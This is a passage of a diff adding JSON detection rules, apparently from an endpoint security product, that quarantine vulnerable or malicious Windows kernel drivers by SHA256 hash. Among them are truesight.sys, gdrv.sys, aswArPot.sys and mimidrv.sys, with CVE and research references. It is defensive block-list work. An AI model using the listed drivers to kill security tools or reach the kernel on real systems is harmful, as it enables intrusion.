+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22573e41-4e25-55ae-b043-c90575b87d14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160988Z",
+ "creation_date": "2026-03-23T11:45:31.160990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d46ac2d32333f11249ab2cb55903a1736d2fe5ed4206b49fb4d6ed151bd5f5d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "225adcae-7df7-5eb6-a770-a8fdc8300a1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487825Z",
+ "creation_date": "2026-03-23T11:45:31.487827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a72552491b4974eefcd717068c211312b14ad187161853bdaff458f734fa9e33",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "225f0cc6-67f0-5fd6-ae9e-7ce48f384bfe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607036Z",
+ "creation_date": "2026-03-23T11:45:29.607038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607043Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2e351efd57c89bc0c7b9d4d440113304d0b8a4c88cdf0126442171aa50634d4",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2265c449-bd48-50f8-a481-44f42e5720a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814839Z",
+ "creation_date": "2026-03-23T11:45:31.814843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d01473998e75d5f07507fad0eef36a95847b2f181fa951545f9f894f39eebdb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2265d2c9-8233-5a1f-8958-db62bd70f760",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471498Z",
+ "creation_date": "2026-03-23T11:45:30.471502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "707b4b5f5c4585156d8a4d8c39cf26729f5ad05d7f77b17f48e670e808e3e6a0",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "226b4eda-bb45-5dc4-b886-1cadd2cf34d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500602Z",
+ "creation_date": "2026-03-23T11:45:31.500605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e79d273fc5bf32ba7bd526428b19322805eaebfbf7ecfde8fa51511085cc9be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22762581-1ab3-5674-a9a6-2fc29c1a6ff7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.623045Z",
+ "creation_date": "2026-03-23T11:45:29.623047Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.623052Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9996b31234ba736fc2c6f2b75f641e25d156f19d6ac84cf85283fde08a714842",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22767396-370b-5c7d-9ef8-8cc6e8a3c900",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463670Z",
+ "creation_date": "2026-03-23T11:45:30.463674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07beac65e28ee124f1da354293a3d6ad7250ed1ce29b8342acfd22252548a5af",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "227d63ea-036c-5b18-8aa9-905e79b2157e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622071Z",
+ "creation_date": "2026-03-23T11:45:29.622073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19c74ea0e0baf04820e5642bd2fa224158801ed966be1041539e3c55bd65c471",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2290678e-0c9f-5db1-ab39-7e4bb04f5bff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974195Z",
+ "creation_date": "2026-03-23T11:45:29.974197Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974202Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "683f0af364f8a19f81d2e095e17de6d403ba3672bdf4a1caf601bca5b57454df",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22a41698-78c8-5c2f-9779-2564483cbf96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614317Z",
+ "creation_date": "2026-03-23T11:45:29.614318Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614324Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22aad86c-63f6-53f2-b100-8806f8a5c54a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821844Z",
+ "creation_date": "2026-03-23T11:45:30.821848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aac9c11490da2ad5316469aa91943b42d019b51ff6f1d9d9767260abd075bb8f",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22ab7e4e-5009-5309-b8d1-16878da04f4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606847Z",
+ "creation_date": "2026-03-23T11:45:29.606849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606855Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e38148ad4ed9946e8600b37f63996bf17c0101e3f50123b3b8513c895a4b521",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22ac0514-acd4-55fc-91c4-347208a3ffdf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969924Z",
+ "creation_date": "2026-03-23T11:45:29.969926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2537f2ad83f5efc841ed75081d5dfffeb04eea92abfb9844adc091ff2a671b56",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22cf99e1-2be5-5e4f-973e-9aa98085ad09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830535Z",
+ "creation_date": "2026-03-23T11:45:31.830537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e100aa891445f18f4805dced7c4055aa5bee6c65995daa42a438349ccad6c3c",
+ "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22e0a162-a400-5bc5-9624-da03f676d009",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471685Z",
+ "creation_date": "2026-03-23T11:45:31.471688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471698Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e891e1acc02731e93da39f46bf24cbae1a30f1bcf4764ad7cf3b9eecdfc10c1f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22e1d574-d320-5ffb-86c5-7ef7063f7ecc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143411Z",
+ "creation_date": "2026-03-23T11:45:32.143413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b49b7bcf44242dac00ca559dca217ec5d935b78c963f23bd0f49f53a610dd569",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://www.loldrivers.io/drivers/fded7e63-0470-40fe-97ed-aa83fd027bad/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22e23e38-782f-5fb1-8d38-e45909c292ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982642Z",
+ "creation_date": "2026-03-23T11:45:29.982644Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982650Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3",
+ "comment": "Malicious Kernel Driver (aka wantd_5.sys) [https://www.loldrivers.io/drivers/3277cecc-f4b4-4a00-be01-9da83e013bcd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22e473ce-86c1-5bfe-8024-32d659f2dba2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609447Z",
+ "creation_date": "2026-03-23T11:45:29.609449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1bd6a40e294f4f74f9baf172f5a3e21dad3b7e31b5757d91bda309bd54a72fbe",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22e4c173-9e10-577c-99d7-25de69970f76",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819106Z",
+ "creation_date": "2026-03-23T11:45:30.819108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "058afe9e93dcc52e64fc0942b80a159b8617608c15462a7a17984de3cc0b8d04",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22eac28d-8c9c-5022-8da7-52da7eca3403",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829429Z",
+ "creation_date": "2026-03-23T11:45:30.829431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829437Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47aadda1c6ccb26783e1bdd85623c62fe96a176bdfc57dfa48be41d23bfa9fbc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22f69a9a-b3d0-5ab5-9c60-b469b8eb714f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833037Z",
+ "creation_date": "2026-03-23T11:45:30.833041Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60c22d313b7a2205957bd713870b8c92c63aef6ca68f408d8a6b4986defe5288",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22fd6278-76cf-5ddf-b162-e1eb551b21e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
